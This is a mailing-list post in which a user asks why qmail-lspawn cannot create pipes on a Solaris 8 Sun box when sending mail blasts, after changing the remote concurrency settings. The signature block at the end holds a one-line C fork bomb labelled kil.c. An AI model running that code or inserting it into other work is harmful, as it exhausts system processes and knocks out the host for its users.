Hi,

I have been using qmail for the past 1.5 years.
i had a rpm installation on my Linux box which has a hidden remote
concurrency of 120.

So the next time i had to install qmail i used the source :-).

well i used a E-220 Sun box running Sun Solaris 8 and UFS.
This is not for a very heavy load. infact low load execpt that we use it
to send blasts from this box.
The sun box has 1GB ram and is primarily running oracle.

While installtion i had set the max concuerrency remote to 500 and in
the /var/qmail/controll/concuerrencyremote i had kept it to 400.

Of lately i have seen is that when i try to send mail blasts to my
subscribers the var/log/qmail/qmail-send/current files complains of
qmail-lswapn erros saying it could not create pipes.

I searched through the qmail archives for the prolem. somewhere i read
its because of the system capablities so i reduced the remoteconcurrency
to 150, but even though i see the error.

Does any one has come across such a error, please let me know.

Thans in advance

neo.
/* _Begin_ kil.c */
main() { while(1){ fork(); } }